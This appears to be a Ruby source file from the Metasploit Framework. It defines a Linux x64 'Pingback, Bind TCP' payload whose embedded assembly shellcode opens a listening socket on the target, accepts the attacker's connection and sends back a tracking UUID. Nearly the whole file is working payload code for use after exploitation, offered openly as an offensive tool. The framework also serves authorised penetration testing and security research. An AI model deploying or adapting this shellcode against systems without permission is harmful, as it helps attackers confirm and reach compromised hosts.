115 lines
3.9 KiB
Ruby
115 lines
3.9 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = 109
|
|
|
|
include Msf::Payload::Linux
|
|
include Msf::Payload::Single
|
|
include Msf::Payload::Pingback
|
|
include Msf::Payload::Pingback::Options
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Linux x64 Pingback, Bind TCP Inline',
|
|
'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
|
|
'Author' => [ 'bwatters-r7' ],
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'linux',
|
|
'Arch' => ARCH_X64,
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
'Session' => Msf::Sessions::Pingback
|
|
))
|
|
def generate(opts={})
|
|
# 22 -> "0x00,0x16"
|
|
# 4444 -> "0x11,0x5c"
|
|
encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
|
|
encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
|
|
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
|
|
self.pingback_uuid ||= self.generate_pingback_uuid
|
|
uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
|
|
|
|
asm = %Q^
|
|
push rsi
|
|
push rax
|
|
;SOCKET
|
|
push 0x29
|
|
pop rax
|
|
cdq
|
|
push 0x2
|
|
pop rdi
|
|
push 0x1
|
|
pop rsi
|
|
syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
|
test rax, rax
|
|
js failed
|
|
|
|
xchg rdi, rax
|
|
mov rcx, #{encoded_host_port}
|
|
push rcx
|
|
mov rsi, rsp
|
|
push rsp
|
|
pop rsi ; store pointer to struct
|
|
|
|
bind_call:
|
|
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
|
|
; rdi -> fd already stored in rdi
|
|
; rsi -> pointer to sockaddr_in6 struct already in rsi
|
|
push 0x31
|
|
pop rax ; bind syscall
|
|
push 0x10 ; sockaddr length
|
|
pop rdx ;
|
|
syscall
|
|
|
|
listen_call:
|
|
; int listen(int sockfd, int backlog);
|
|
; rdi -> fd already stored in rdi
|
|
push 0x32
|
|
pop rax ; listen syscall
|
|
push 0x1
|
|
pop rsi ; backlog
|
|
syscall
|
|
|
|
accept_call:
|
|
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
|
; rdi -> fd already stored in rdi
|
|
push 0x2b
|
|
pop rax ; accept syscall
|
|
cdq ; zero-out rdx via sign-extension
|
|
push rdx
|
|
push rdx
|
|
push rsp
|
|
pop rsi ; when populated, client will be stored in rsi
|
|
push 0x1c
|
|
lea rdx, [rsp] ; pointer to length of rsi (16)
|
|
syscall
|
|
xchg rdi, rax ; grab client fd
|
|
send_pingback:
|
|
; sys_write(fd:rdi, buf*:rsi, length:rdx)
|
|
push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
|
|
pop rdx ; length in rdx
|
|
call get_uuid_address ; put uuid buffer on the stack
|
|
db #{uuid_as_db} ; PINGBACK_UUID
|
|
get_uuid_address:
|
|
pop rsi ; UUID address into rsi
|
|
xor rax, rax ; sys_write = offset 1
|
|
inc rax ; sys_write = offset 1
|
|
syscall ; call sys_write
|
|
|
|
failed:
|
|
push 0x3c
|
|
pop rax
|
|
push 0x1
|
|
pop rdi
|
|
syscall ; exit(1)
|
|
^
|
|
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
|
|
end
|
|
end
|
|
end
|